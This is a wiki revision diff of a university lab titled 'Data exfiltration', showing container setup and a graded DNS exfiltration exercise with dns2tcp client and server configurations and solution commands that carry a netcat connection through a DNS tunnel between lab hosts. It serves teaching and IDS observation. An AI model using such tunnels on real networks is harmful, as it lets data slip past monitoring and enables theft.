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cdci:labs:6 [2020/03/17 01:33]
mihai.chiroiu [07. [20p] DNS exfiltration]
cdci:labs:6 [2024/05/10 14:22] (current)
mihai.chiroiu [01. [5p] Virtual machine setup]
Line 1: Line 1:
 ====== Lab06. Data exfiltration ​ ====== ====== Lab06. Data exfiltration ​ ======
 +<note warning>
 +Important read to be graded!
 ===== Objectives ===== ===== Objectives =====
Line 22: Line 27:
 git clone -b labs --single-branch https://​github.com/​mihai-chiroiu/​cdci.git git clone -b labs --single-branch https://​github.com/​mihai-chiroiu/​cdci.git
 git config user.email "​student@upb.ro"​ git config user.email "​student@upb.ro"​
 +Now we need to build some docker containers
 +root@cdci:/#​ cd cdci/​containers/​exfiltration_lab06/​
 +root@cdci:/#​ make
 </​code>​ </​code>​
Line 193: Line 204:
 ==== 07. [20p] DNS exfiltration ==== ==== 07. [20p] DNS exfiltration ====
-To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). ​For this exercise we strongly encourage you to view the data in Wireshark. +For this exercise we are going to create a DNS tunnel between ​the two nodes and use it for the Netcat connectionThe tool for this is [[http://​www.linuxcertif.com/​man/​1/​dns2tcpc/​|dns2tcp]]. Use the following configuration for the client/​server side. 
- +  * Client side configuration 
-a. Client side configuration:+<​code>​
 # cat .dns2tcprc # cat .dns2tcprc
 domain = dns2tcp.cdci.ro domain = dns2tcp.cdci.ro
 resource = nc resource = nc
-local_port = 9000+local_port = 8080
 key = secretkey key = secretkey
-b. Server side configuration:+</​code>​ 
 +  * Server side configuration 
 # cat .dns2tcpdrc # cat .dns2tcpdrc
 listen = listen =
Line 210: Line 223:
 domain = dns2tcp.cdci.ro domain = dns2tcp.cdci.ro
 key = secretkey key = secretkey
-resources = nc:​​9000+resources = nc:​​8080 
 +To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark.
 <​solution>​ <​solution>​
 <​code>​ <​code>​
 +root@h2:/# dns2tcpd -f .dns2tcpdrc ​
 +root@h2:/# netstat -nlup
 +Active Internet connections (only servers)
 +Proto Recv-Q Send-Q Local Address ​          ​Foreign Address ​        ​State ​      ​PID/​Program name    ​
 +udp        0      0​53 ​   ​* ​                          ​428/​dns2tcpd ​          
 +root@h2:/# nc -l -p 8080 -k
 +root@h1:/# dns2tcpc -f .dns2tcprc &
 +[2] 196
 +root@h1:/# Listening on port : 8080
 +root@h1:/# netstat -nltp
 +Active Internet connections (only servers)
 +Proto Recv-Q Send-Q Local Address ​          ​Foreign Address ​        ​State ​      ​PID/​Program name    ​
 +tcp        0      0​8080 ​​* ​              ​LISTEN ​     196/​dns2tcpc ​  
 +root@h1:/# nc 8080
 </​code>​ </​code>​
 </​solution>​ </​solution>​
cdci/labs/6.1584401599.txt.gz · Last modified: 2020/03/17 01:33 by mihai.chiroiu
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